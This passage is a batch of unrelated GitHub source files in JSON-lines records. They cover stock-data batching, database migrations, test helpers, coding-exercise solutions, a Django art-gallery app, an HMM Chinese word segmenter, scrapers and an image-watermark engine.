UpdateMarketData, UpdateDaily, MacroData, EtfData\nfrom hot_issue import UpdateHotIssue\nfrom hot_theme import UpdateHotTheme\nfrom index_data.theme import ThemeIndex\nfrom exp_return import UpdateExpReturn\nfrom datetime import datetime\nimport momentum.create_fields\nimport lib\n\n\ndef main():\n\n # Update: per-stock market data (key: cmp_cd)\n is_update_all = False\n update_market_data = UpdateMarketData(is_update_all)\n update_market_data.run()\n del update_market_data\n\n # Update: per-stock market data (key: date)\n is_update_all = False\n update_daily = UpdateDaily(is_update_all)\n update_daily.run()\n del update_daily\n\n # Update: per-stock market data (period change rates)\n c_chg_freq = lib.StockChgFreq()\n c_chg_freq.run()\n del c_chg_freq\n\n # Update: macro data\n MacroData().run()\n\n # Update: ETF data\n EtfData().run()\n\n # Update: generate momentum data (Stock)\n momentum.create_fields.create_stock_field()\n\n # Update: daily hot-issue stock info\n update_hot_issue = UpdateHotIssue()\n update_hot_issue.update_hot_issue_date()\n del update_hot_issue\n\n # Update: daily major theme info\n UpdateHotTheme.update_hot_theme(False)\n\n # Update: index (theme)\n c_theme_index = ThemeIndex(datetime(2006, 1, 1), datetime.today())\n c_theme_index.run()\n del c_theme_index\n\n # Update: index (theme) (period change rates)\n c_chg_freq = lib.ThemeChgFreq()\n c_chg_freq.run()\n del c_chg_freq\n\n # Update: expected return per stock\n UpdateExpReturn().run()\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"song-junho/DailyBatch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"35368428185","text":"\"\"\"update users table to include allowed hospitals\n\nRevision ID: bc96b4274043\nRevises: 72caed04d5fa\nCreate Date: 2021-02-08 07:57:32.961869\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'bc96b4274043'\ndown_revision = '72caed04d5fa'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('allowed_hospitals', sa.JSON(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('user', 'allowed_hospitals')\n # ### end Alembic commands ###\n","repo_name":"codeforpakistan/LabTech","sub_path":"backend/app/alembic/versions/bc96b4274043_update_users_table_to_include_allowed_.py","file_name":"bc96b4274043_update_users_table_to_include_allowed_.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"7868676551","text":"from model.project import Project\n\nclass MantisHelper:\n\n def __init__(self, app):\n self.app = app\n\n def open_main_page(self):\n wd = self.app.wd\n # open contacts page\n if not wd.current_url.endswith(\"/my_view_page.php\"):\n self.app.open_home_page()\n\n def open_projects_page(self):\n wd = self.app.wd\n wd.find_element_by_link_text(\"Manage\").click()\n wd.find_element_by_link_text(\"Manage Projects\").click()\n\n def add_project(self, project):\n wd = self.app.wd\n self.open_main_page()\n self.open_projects_page()\n wd.find_element_by_xpath(\"//input[@value='Create New Project']\").click()\n self.fill_project_form(project)\n wd.find_element_by_xpath(\"//input[@value='Add Project']\").click()\n self.project_cache = None\n\n def fill_project_form(self, project):\n wd = self.app.wd\n self.change_field_value(\"name\", project.name)\n self.change_field_value(\"description\", project.description)\n wd.find_element_by_css_selector('select[name=\"status\"] > option[value=%s]' % project.status).click()\n wd.find_element_by_css_selector('select[name=\"view_state\"] > option[value=%s]' % project.viewstate).click()\n\n def change_field_value(self, field_name, text):\n wd = self.app.wd\n if text is not None:\n wd.find_element_by_name(field_name).click()\n wd.find_element_by_name(field_name).clear()\n wd.find_element_by_name(field_name).send_keys(text)\n\n project_cache = None\n\n def get_project_list(self):\n if self.project_cache is None:\n wd = self.app.wd\n self.open_main_page()\n self.open_projects_page()\n self.project_cache = []\n for row in wd.find_elements_by_xpath(\"//table[@class='width100']\")[1].find_elements_by_css_selector(\".row-1, .row-2\"):\n cells = row.find_elements_by_tag_name(\"td\")\n name = cells[0].text\n description = cells[4].text\n status = cells[1].text\n viewstate = cells[3].text\n self.project_cache.append(Project(name=name, status=status, viewstate=viewstate, description=description))\n return list(self.project_cache)\n\n def select_project_by_index(self, index):\n wd = self.app.wd\n # select contact\n wd.find_elements_by_xpath(\"//table[@class='width100']\")[1].find_elements_by_css_selector(\"a[href *= 'manage_proj_edit_page']\")[index].click()\n\n def delete_project(self, index):\n wd = self.app.wd\n self.open_main_page()\n self.open_projects_page()\n self.select_project_by_index(index)\n wd.find_element_by_xpath(\"//input[@value='Delete Project']\").click()\n wd.find_element_by_xpath(\"//input[@value='Delete Project']\").click()\n self.project_cache = None\n","repo_name":"blotskaya/mantis","sub_path":"fixture/mantis.py","file_name":"mantis.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"7116662902","text":"# 2292\n\n# Let's figure out how this works and find the pattern in the number of rooms passed through.\n# There was no real need to derive the general term of 1, 7, 19, 37, ...\n# Still, I worked it out well in the end, so kudos for now!\n\n# Python has no ++; use += instead.
\n\n\n# Copied code\n##n = int(input())\n##\n##nums_pileup = 1 # number of honeycomb cells, starting from 1\n##cnt = 1\n##while n > nums_pileup :\n## nums_pileup += 6 * cnt # cells increase in multiples of 6\n## cnt += 1 # number of loop iterations\n##print(cnt)\n\n# Code I thought up myself after deriving the general term\nn = int(input())\nr = 1\nmore = True # keep going\n\nif (n == r):\n print(r)\nelse:\n r += 1\n while (more):\n if (((3*(r - 1)**2 - 3 * (r - 1) + 1) < n) and (n <= (3*r**2 - 3*r +1))):\n print(r)\n more = False\n else:\n r += 1\n","repo_name":"soohyeon21/study","sub_path":"BaekJoon/step8_math1/8_2_b2_2292.py","file_name":"8_2_b2_2292.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"1431146214","text":"# -*- coding: utf-8 -*-\nfrom urllib import request\nimport json\ndef fetch_data(url):\n req = request.Request(url)\n data = None\n with request.urlopen(req) as r:\n data = json.loads(str(r.read(),encoding=\"utf-8\"))\n return data\n\n\n \n# Test\nURL = 'https://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20weather.forecast%20where%20woeid%20%3D%202151330&format=json'\ndata = fetch_data(URL)\nprint(data)\nassert data['query']['results']['channel']['location']['city'] == 'Beijing'\nprint('ok')","repo_name":"kumaeki/python_introduction","sub_path":"do_lib_urllib_practise.py","file_name":"do_lib_urllib_practise.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"2014515693","text":"import boto3\nfrom urllib.parse import unquote_plus\nimport os\ns3_client = boto3.client('s3')\n\n\ndef run(event, context):\n initial_event_bucket = event['initial_event_bucket']\n original_file_name = event['file_name']\n clean_file_name = unquote_plus(original_file_name) # strips special characters\n\n # copy to the destination path\n destination_file_name = clean_file_name.replace(\"source\", \"destination\")\n\n copy_source_object = {'Bucket': initial_event_bucket, 'Key': clean_file_name}\n destination_bucket = os.environ['destiny_bucket']\n\n print(f\"bucket inicial \"+initial_event_bucket+\" Key destiny: \"+destination_file_name)\n\n s3_client.copy_object(CopySource=copy_source_object, Bucket=destination_bucket , Key=destination_file_name)\n\n print(\" BUCKET: \" + initial_event_bucket + \" KEY: \" + destination_file_name)","repo_name":"rsradulescu/cloudformation_dynamoparameter","sub_path":"functions/003_csvfile_lambda/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"73412169793","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path(\"register\", views.register, name=\"register\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"journal\", views.journal, name=\"journal\"),\n path(\"journal/add\", views.add_journal, name=\"add_journal\"),\n path(\"journal/edit/\", views.edit_journal, name=\"edit_journal\"),\n path(\"journal/delete/\", views.delete_journal, name=\"delete_journal\"),\n path(\"bloombot\", views.bloombot, name=\"bloombot\"),\n path(\"todos\", views.todos, name=\"todos\"),\n path(\"add_todo\", views.add_todo, name=\"add_todo\"),\n path(\"privacy-policy\", views.privacy_policy, name=\"privacy-policy\"),\n path(\"blog\", views.blog, name=\"blog\"),\n path(\"blog/\", views.blog_post, name=\"blog_post\"),\n path(\"resources\", views.resources, name=\"resources\"),\n\n # API routes\n path(\"todos/changed/checked/\", views.check_todo, name=\"check_todo\"),\n path(\"todos/changed/unchecked/\", views.uncheck_todo, name=\"uncheck_todo\"),\n path(\"todos/changed/delete/\", views.delete_todo, name=\"delete_todo\"),\n]","repo_name":"Treasure-Mayowa/BloomDev","sub_path":"render/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26088638345","text":"class Solution(object):\n def characterReplacement(self, s, k):\n \"\"\"\n :type s: str\n :type k: int\n :rtype: int\n \"\"\"\n count = {}\n l = 0\n r = 0\n res = 0\n for r in range(len(s)):\n count[s[r]] = 1 + count.get(s[r], 0)\n freq = max(count.values())\n while (r - l + 1) - freq > k:\n count[s[l]] -= 1\n l += 1\n res = max(res, r - l + 1)\n return res","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"0424-longest-repeating-character-replacement/0424-longest-repeating-character-replacement.py","file_name":"0424-longest-repeating-character-replacement.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18375173764","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/1/3 7:50 PM\n# @Author : WittonZhou\n# @File : HMM.py\n\nimport numpy as np\nimport time\n'''\nHMM模型\n'''\n\n\ndef load_data(filename):\n \"\"\"\n 加载数据集\n :param filename: \n :return: \n \"\"\"\n artical = []\n with open(filename, encoding='utf-8') as f:\n for line in f.readlines():\n line = line.strip()\n artical.append(line)\n return artical\n\n\ndef train(filename):\n \"\"\"\n 依据训练文本统计PI、A、B\n :param filename: \n :return: \n \"\"\"\n # 定义一个查询字典,用于映射四种标记在数组中对应的位置,方便查询\n # B:词语的开头\n # M:一个词语的中间词\n # E:一个词语的结果\n # S:非词语,单个词\n statusDict = {'B': 0, 'M': 1, 'E': 2, 'S': 3}\n\n # 每个字只有四种状态,所以下方的各类初始化中大小的参数均为4\n # 初始化PI的一维数组,因为对应四种状态,大小为4\n PI = np.zeros(4)\n # 初始化状态转移矩阵A,涉及到四种状态各自到四种状态的转移,因为大小为4x4\n A = np.zeros((4, 4))\n # 初始化观测概率矩阵,分别为四种状态到每个字的发射概率\n # 因为是中文分词,使用ord(汉字)即可找到其对应编码,这里用一个65536的空间来保证对于所有的汉字都能\n # 找到对应的位置来存储\n B = np.zeros((4, 65536))\n # 读训练文本\n with open(filename, encoding='utf-8') as f:\n # 文本中的每一行认为是一个训练样本\n # 在统计上,三个参数依据“10.3.2” Baum-Welch算法内描述的统计\n # PI依据式10.35\n # A依据10.37\n # B依据10.38\n # 注:并没有使用Baum-Welch算法,只是借助了其内部的三个参数生成公式,其实\n # 公式并不是Baum-Welch特有的,只是在那一节正好有描述\n for line in f.readlines():\n # 对单行句子按空格进行切割\n current_line = line.strip().split()\n # 对词性的标记放在该列表中\n wordLabel = []\n # 对每一个单词进行遍历\n for i in range(len(current_line)):\n # 如果长度为1,则直接将该��标记为S,即单个词\n if len(current_line[i]) == 1:\n label = 'S'\n 
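# (Editor's note) Multi-character words are tagged B + M*(len-2) + E below,\n # e.g. a 4-character word gets \"BMME\" and a 2-character word just \"BE\".\n 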
else:\n                    # 如果长度不为1,开头为B,最后为E,中间添加长度-2个M\n                    # 如果长度刚好为2,长度-2=0也就不添加了,反之添加对应个数的M\n                    label = 'B' + 'M' * (len(current_line[i]) - 2) + 'E'\n\n                # 如果是单行开头第一个字,PI中对应位置加1,\n                if i == 0:\n                    PI[statusDict[label[0]]] += 1\n\n                # 对于该单词中的每一个字,在生成的状态链中统计B\n                for j in range(len(label)):\n                    # 遍历状态链中每一个状态,并找到对应的中文汉字,在B中对应位置加1\n                    B[statusDict[label[j]]][ord(current_line[i][j])] += 1\n\n                # 在整行的状态链中添加该单词的状态链\n                # 注意:extend表直接在原先元素的后方添加,可以百度一下extend和append的区别\n                wordLabel.extend(label)\n\n            # 单行所有单词都结束后,统计A信息\n            # 因为A涉及到前一个状态,因此需要等整条状态链都生成了才能开始统计\n            for i in range(1, len(wordLabel)):\n                # 统计t时刻状态和t-1时刻状态的所有状态组合的出现次数\n                A[statusDict[wordLabel[i - 1]]][statusDict[wordLabel[i]]] += 1\n\n    # 上面代码在统计上全部是统计的次数,实际运算需要使用概率,\n    # 下方代码是将三个参数的次数转换为概率\n    # ----------------------------------------\n    # 对PI求和,概率生成中的分母\n    sum = np.sum(PI)\n    # 遍历PI中每一个元素,元素出现的次数/总次数即为概率\n    for i in range(len(PI)):\n        # 如果某元素没有出现过,该位置为0,在后续的计算中这是不被允许的\n        # 比如说某个汉字在训练集中没有出现过,那在后续不同概率相乘中只要有\n        # 一项为0,其他都是0了,此外整条链很长的情况下,太多0-1的概率相乘\n        # 不管怎样最后的结果都会很小,很容易下溢出\n        # 所以在概率上我们习惯将其转换为log对数形式,这在书上是没有讲的\n        # x大的时候,log也大,x小的时候,log也相应小,我们最后比较的是不同\n        # 概率的大小,所以使用log没有问题\n\n        # 那么当单向概率为0的时候,log没有定义,因此需要单独判断\n        # 如果该项为0,则手动赋予一个极小值\n        if PI[i] == 0:\n            PI[i] = -3.14e+100\n        # 如果不为0,则计算概率,再对概率求log\n        else:\n            PI[i] = np.log(PI[i] / sum)\n\n    # 与上方PI思路一样,求得A的概率对数\n    for i in range(len(A)):\n        sum = np.sum(A[i])\n        for j in range(len(A[i])):\n            if A[i][j] == 0:\n                A[i][j] = -3.14e+100\n            else:\n                A[i][j] = np.log(A[i][j] / sum)\n\n    # 与上方PI思路一样,求得B的概率对数\n    for i in range(len(B)):\n        sum = np.sum(B[i])\n        for j in range(len(B[i])):\n            if B[i][j] == 0:\n                B[i][j] = -3.14e+100\n            else:\n                B[i][j] = np.log(B[i][j] / sum)\n\n    # 返回统计得到的三个参数\n    return PI, A, B\n\n\ndef participle(artical, PI, A, B):\n    \"\"\"\n    分词\n    算法依据“10.4.2 维特比算法”\n    :param artical: 要分词的文章\n    :param PI: 初始状态概率向量PI\n    :param A: 状态转移矩阵\n    :param B: 观测概率矩阵\n    :return: 分词后的文章\n    \"\"\"\n    part_artical = []\n    for line in artical:\n        # 初始化δ,δ存放四种状态的概率值,因为状态链中每个状态都有\n        delta = [[0 for i in range(4)] for i in range(len(line))]\n        for i in range(4):\n            # 初始化δ状态链中第一个状态的四种状态概率\n            delta[0][i] = PI[i] + B[i][ord(line[0])]\n        # 初始化ψ,初始时为0\n        psi = [[0 for i in range(4)] for i in range(len(line))]\n\n        for t in range(1, len(line)):\n            for i in range(4):\n                tmpDelta = [0] * 4\n                for j in range(4):\n                    tmpDelta[j] = delta[t - 1][j] + A[j][i]\n                # 找到最大的那个δ * a,\n                maxDelta = max(tmpDelta)\n                # 记录最大值对应的状态\n                maxDeltaIndex = tmpDelta.index(maxDelta)\n\n                # 将找到的最大值乘以b放入,\n                # 注意:这里同样因为log变成了加法\n                delta[t][i] = maxDelta + B[i][ord(line[t])]\n                # 在ψ中记录对应的最大状态索引\n                psi[t][i] = maxDeltaIndex\n\n        # 建立一个状态链列表,开始生成状态链\n        sequence = []\n        # 算法10.5 第三步:终止\n        # 在上面for循环全部结束后,很明显就到了第三步了\n        # 获取最后一个状态的最大状态概率对应的索引\n        i_opt = delta[len(line) - 1].index(max(delta[len(line) - 1]))\n        # 在状态链中添加索引\n        # 注:状态链应该是B、M、E、S,这里图方便用了0、1、2、3,其实一样的\n        sequence.append(i_opt)\n        # 算法10.5 第四步:最优路径回溯\n        # 从后往前遍历整条链\n        for t in range(len(line) - 1, 0, -1):\n            # 不断地从当前时刻t的ψ列表中读取到t-1的最优状态\n            i_opt = psi[t][i_opt]\n            # 将状态放入列表中\n            sequence.append(i_opt)\n        # 因为是从后往前将状态放入的列表,所以这里需要翻转一下,变成了从前往后\n        sequence.reverse()\n\n        # 开始对该行分词\n        current_line = ''\n        # 遍历该行每一个字\n        for i in range(len(line)):\n            # 在列表中放入该字\n            current_line += line[i]\n            # 如果该字是3:S->单个词 或 2:E->结尾词 ,则在该字后面加上分隔符 |\n            # 此外如果改行的最后一个字了,也就不需要加 |\n            if (sequence[i] == 3 or sequence[i] == 2) and i != (len(line) - 1):\n                current_line += '|'\n        # 在返回列表中添加分词后的该行\n        part_artical.append(current_line)\n    # 返回分词后的文章\n    return part_artical\n\n\nif __name__ == '__main__':\n    start = time.time()\n    artical = load_data('test.txt')\n    PI, A, B = train('train.txt')\n\n    # 打印原文\n    print('原文如下:')\n    for line in artical:\n        
print(line)\n\n # 进行分词\n part_artical = participle(artical, PI, A, B)\n\n # 打印结果\n print('分词后:')\n for line in part_artical:\n print(line)\n\n print('消耗时间为:', time.time() - start)\n\n\n","repo_name":"wittonzhou/LiHang-Statistical-Learning","sub_path":"HMM/HMM.py","file_name":"HMM.py","file_ext":"py","file_size_in_byte":9287,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29837764037","text":"import re\n\nfrom fiftystates.scrape.committees import CommitteeScraper, Committee\n\nimport lxml.html\n\n\nclass CACommitteeScraper(CommitteeScraper):\n state = 'ca'\n\n def scrape(self, chamber, term):\n if chamber != 'lower' or term != '20092010':\n return\n\n list_url = 'http://www.assembly.ca.gov/acs/comDir.asp'\n with self.urlopen(list_url) as list_page:\n list_page = lxml.html.fromstring(list_page)\n list_page.make_links_absolute(list_url)\n\n for a in list_page.xpath('//ul/a'):\n comm = Committee('lower', a.text.strip())\n self.scrape_committee_members(comm, a.attrib['href'])\n self.save_committee(comm)\n\n def scrape_committee_members(self, committee, url):\n # break out of frame\n url = url.replace('newcomframeset.asp', 'welcome.asp')\n\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n\n for a in page.xpath('//tr/td/font/a'):\n if re.match('^(mailto:|javascript:)', a.attrib['href']):\n continue\n\n name = a.xpath('string(ul)').strip()\n name = re.sub('\\s+', ' ', name)\n\n parts = name.split('-', 2)\n if len(parts) > 1:\n name = parts[0].strip()\n mtype = parts[1].strip().lower()\n else:\n mtype = 'member'\n\n committee.add_member(name, mtype)\n","repo_name":"runderwood/fiftystates","sub_path":"fiftystates/scrape/ca/committees.py","file_name":"committees.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73968072834","text":"import random\nsuits = [\"piki\",\"bubna\", \"chervi\"]\nfaces = [\"dvoika\", \"troyka\", \"chetverka\", \"peterka\", \"shesterka\", \"semerka\", \"vosmerka\",\"devyatka\", \"desyatka\", \"valet\", \"dama\",\"korol\", \"tuz\"]\nkeep_going = True\nwhile keep_going:\n my_face = random.choice(faces)\n my_suit = random.choice(suits)\n your_face = random.choice(faces)\n your_suit = random.choice(suits)\n print(\"У меня\", my_face, \"\", my_suit)\n print(\"У ВАС\", your_face, \"\", your_suit)\n if faces.index(my_face) > faces.index(your_face):\n print(\"Я победил!\")\n elif faces.index(my_face) < faces.index(your_face):\n print(\"ВЫ ПОБЕДИЛИ!\")\n else:\n print(\"У НАС НИЧЬЯ!\")\n answer = input(\"Нажмите [ENTER], ЧТОБЫ ПРОДОЛЖИТЬ,ЛЮБУЮ\")\n keep_going = (answer == \"\")\n","repo_name":"zhanibekov/python-learning","sub_path":"chapter6/HighCard.py","file_name":"HighCard.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4330481950","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User \nfrom app.models import Artista,Tecnica,Obra\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout\nfrom django.contrib import messages\nfrom .forms import TecnicaForm\n\n# Create your views here.\n\ndef index(request):\n context={}\n return render(request, 'index.html', context)\n\ndef administrador(request):\n context={}\n return render(request, 'administrador.html', context)\n\ndef agregarO(request):\n return 
render(request, 'agregarO.html')\n\ndef formulario(request):\n    context={}\n    return render(request, 'formulario.html', context)\n\ndef galeria(request):\n    context={}\n    return render(request, 'galeria.html', context)\n\ndef obra1(request):\n    context={}\n    return render(request, 'obra1.html', context)\n\ndef obra2(request):\n    context={}\n    return render(request, 'obra2.html', context)\n\ndef obra3(request):\n    context={}\n    return render(request, 'obra3.html', context)\n\ndef obra4(request):\n    context={}\n    return render(request, 'obra4.html', context)\n\ndef artistas(request):\n    context={}\n    return render(request, 'artistas.html', context)\n\n\n\n\ndef crear(request):\n    if request.method != \"POST\":\n        users = User.objects.all()\n        context = {\n            'users': users\n        }\n        return render(request, 'registro.html', context)\n    else:\n        nombre = request.POST[\"nombre\"]\n        apellido = request.POST[\"apellido\"]\n        email = request.POST[\"email\"]\n        telefono = request.POST[\"telefono\"]\n        contraseña = request.POST[\"password\"]\n        obj1 = Artista.objects.create(\n            nombre=nombre,\n            apellido=apellido,\n            email=email,\n            telefono=telefono,\n            contraseña=contraseña,\n        )\n        obj = User.objects.create_user(\n            username=email,\n            password=contraseña,\n            first_name=nombre,\n            last_name=apellido\n        )\n        obj1.save()\n        obj.save()\n        \n        users = User.objects.all()\n        return redirect('login')\n\n    \n    \n@login_required\ndef menu(request):\n    user = request.user\n    return render(request, 'menu.html', {'user': user})\n    \ndef logout_view(request):\n    logout(request)\n    return redirect('login')\n\ndef inserta_tecnica(request):\n    if request.method == \"POST\":\n        form = TecnicaForm(request.POST)\n        if form.is_valid():\n            form.save()\n            form=TecnicaForm()\n            msg='Tecnica ingresado correctamente'\n            context={\"form\":form,'msg':msg}\n            return render(request,'crud/agregarT.html',context)\n        # formulario invalido: volver a mostrarlo con sus errores\n        context={\"form\":form}\n        return render(request,'crud/agregarT.html',context)\n    else:\n        form = TecnicaForm()\n        context={\"form\":form}\n        return render(request,'crud/agregarT.html',context)\n    \ndef crud_tecnica(request):\n\ttecnicas=Tecnica.objects.all()\n\tcontext={\"tecnicas\":tecnicas}\n\treturn render(request,'crud/crudtec.html',context)\n\ndef borra_tecnica(request,pk):\n    try:\n        tecnica=Tecnica.objects.get(id_tecnica=pk)\n        tecnica.delete()\n        tecnicas=Tecnica.objects.all()\n        context={'tecnicas':tecnicas}\n        return render(request,'crud/crudtec.html',context)\n    except:\n        mensaje='Tecnica no Existe' \n        tecnicas=Tecnica.objects.all()\n        context={'tecnicas':tecnicas,'mensaje':mensaje}\n        return render(request,'crud/crudtec.html',context) \n\ndef modifica_tecnica(request,pk):\n    try:\n        tecnica=Tecnica.objects.get(id_tecnica=pk) \n        if tecnica:\n            if request.method == \"POST\":\n                form = TecnicaForm(request.POST,instance=tecnica)\n                form.save()\n                tecnicas=Tecnica.objects.all()\n                contexto={'tecnicas':tecnicas} \n                return render(request,'crud/crudtec.html',contexto)\n            else:\n                form = TecnicaForm(instance=tecnica) \n                contexto={'form':form,'tecnica':tecnica}\n                return render(request,'crud/modifica_tecnica.html',contexto) \n    except:\n        contexto={'mensaje': 'Error - Tecnica no existe'}\n        return render(request,'crud/crudtec.html',contexto)\n\n\n@login_required\ndef crud(request):\n    usuario = request.user\n    obras = Obra.objects.filter(artista=request.user.username)\n    \n    if \"usuario\" not in request.session:\n        request.session[\"usuario\"] = request.user.username\n        usuario = request.session[\"usuario\"]\n    else:\n        usuario = request.session[\"usuario\"] \n    \n    context = {\"usuario\": usuario, \"obras\": obras}\n    return render(request, 'crud/crud.html', context)\n\n\ndef 
inserta_obra(request):\n    if request.method != \"POST\":\n        tecnicas=Tecnica.objects.all()\n        context={\"tecnicas\":tecnicas}\n        return render(request,'crud/agregarO.html',context)\n    else:\n        artista = Artista.objects.get(email=request.user.username)\n        tecnicas=Tecnica.objects.all()\n        titulo=request.POST[\"titulo\"]\n        dimensiones=request.POST[\"dimensiones\"]\n        fecha=request.POST[\"fecha\"]\n        tecnica=request.POST[\"tecnica\"]\n        descripcion=request.POST[\"descripcion\"]\n        imagen=request.FILES[\"imagen\"]\n        if \"destacada\" in request.POST:\n            destacada=1\n        else:\n            destacada=0\n        objTecnica=Tecnica.objects.get(id_tecnica=tecnica)\n        obj=Obra.objects.create( titulo=titulo,\n                                 dimensiones=dimensiones,\n                                 fecha=fecha,\n                                 id_tecnica=objTecnica,\n                                 descripcion=descripcion,\n                                 imagen=imagen,\n                                 artista=artista,\n                                 destacada=destacada)\n        obj.save() \n        context={\"mensaje\":'Obra Ingresada Exitosamente!'}\n        return redirect('crud')\n\n\ndef borra_obra(request,pk):\n    context={}\n    try:\n        obra=Obra.objects.get(id_obra=pk)\n        obra.delete()\n        mensaje='obra Eliminada Exitosamente'\n        obras=Obra.objects.all()\n        context={'obras':obras,'mensaje':mensaje}\n        return render(request,'crud/crud.html',context)\n    except:\n        mensaje='Obra no Existe' \n        obras=Obra.objects.all()\n        context={'obras':obras,'mensaje':mensaje}\n        return render(request,'crud/crud.html',context) \n\ndef busca_obra(request,pk):\n    if pk!='':\n        obra=Obra.objects.get(id_obra=pk)\n        tecnicas=Tecnica.objects.all()\n        context={'obra':obra,'tecnicas':tecnicas}\n        if obra:\n            return render(request,'crud/modifica_obra.html',context)\n    else:\n        context={'mensaje': 'Error - Obra no encontrado'}\n        return render(request,'crud/crud.html',context)\n    \ndef modifica_obra(request, pk):\n    if request.method == \"POST\":\n        obra = Obra.objects.get(id_obra=pk)\n        artista = Artista.objects.get(email=request.user.username)\n        tecnicas = Tecnica.objects.all()\n        obra.titulo = request.POST[\"titulo\"]\n        obra.dimensiones = request.POST[\"dimensiones\"]\n        obra.fecha = request.POST[\"fecha\"]\n        obra.descripcion = request.POST[\"descripcion\"]\n        obra.id_tecnica = Tecnica.objects.get(id_tecnica=request.POST[\"tecnica\"])\n        if \"destacada\" in request.POST:\n            obra.destacada=1\n        else:\n            obra.destacada=0\n\n        # Verificar si se proporciona una nueva imagen\n        imagen = request.FILES.get(\"imagen\")\n        if imagen:\n            obra.imagen = imagen\n\n        obra.save() # Guardar los cambios en la obra existente\n\n        obras = Obra.objects.all()\n        context = {\"obras\": obras}\n        return render(request, 'crud/crud.html', context)\n\n    else:\n        # Obtener la obra existente para mostrarla en el formulario\n        obra = Obra.objects.get(id_obra=pk)\n        tecnicas = Tecnica.objects.all()\n        return render(request, 'crud/modifica_obra.html', {\"obra\": obra, \"tecnicas\": tecnicas})\n\n","repo_name":"Eldonndan/Arte","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7986,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35130863586","text":"#output the product of two matrices X*Y\n#where Y is the transpose of X\n#X is a 5X3 matrix\n#Transpose - cause (two or more things) to change places with each other.\ndef main():\n    X = [[1,2,3],\n        [4,5,6],\n        [7,8,9],\n        [10,11,12],\n        [13,14,15]]\n\n    Y = []\n    for i in range(3):\n        Y.append([row[i] for row in X])\n\n    # pre-fill the result with zeros so the += accumulation below can index it\n    result = [[0] * len(Y[0]) for _ in range(len(X))]\n\n    # iterate through rows of X\n    for i in range(len(X)):\n        # iterate through columns of Y\n        for j in range(len(Y[0])):\n            # iterate through rows of Y\n            for k in range(len(Y)):\n                result[i][j] += X[i][k] 
* Y[k][j]\n\n for r in result:\n print(r)\n\nmain()","repo_name":"brandon-rowe/Python","sub_path":"Exams/Final/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42183777346","text":"from sorl.thumbnail.engines.pgmagick_engine import Engine as MagickEngine\nfrom sorl_watermarker.engines.base import WatermarkEngineBase\nfrom pgmagick import Geometry, Image, CompositeOperator as CoOp\nfrom pgmagick import ChannelType, ImageType, QuantumOperator as QuOp\n\n\nclass Engine(WatermarkEngineBase, MagickEngine):\n \"\"\"\n PGMagick based engine with watermark support.\n \"\"\"\n def _watermark(self, image, watermark_path, opacity, size, position_str):\n watermark = self.get_image(open(watermark_path))\n image_size = self.get_image_size(image)\n layer = Image(Geometry(image_size[0], image_size[1]), 'transparent')\n if opacity < 1:\n self._reduce_opacity(watermark, opacity)\n if not size:\n mark_size = self.get_image_size(watermark)\n else:\n mark_size = self._get_new_watermark_size(size, self.get_image_size(watermark))\n options = {'crop': 'center',\n 'upscale': False}\n watermark = self.scale(watermark, mark_size, options)\n watermark = self.crop(watermark, mark_size, options)\n\n position = self._define_watermark_position(position_str, image_size, mark_size)\n layer.composite(watermark, position[0], position[1], CoOp.OverCompositeOp)\n image.composite(layer, 0, 0, CoOp.OverCompositeOp)\n return image\n\n\n def _reduce_opacity(self, watermark, opacity):\n \"\"\"\n Returns an image with reduced opacity. Converts image to RGBA if needs.\n\n Simple watermark.opacity(65535 - int(65535 * opacity) would not work for\n images with the Opacity channel (RGBA images). 
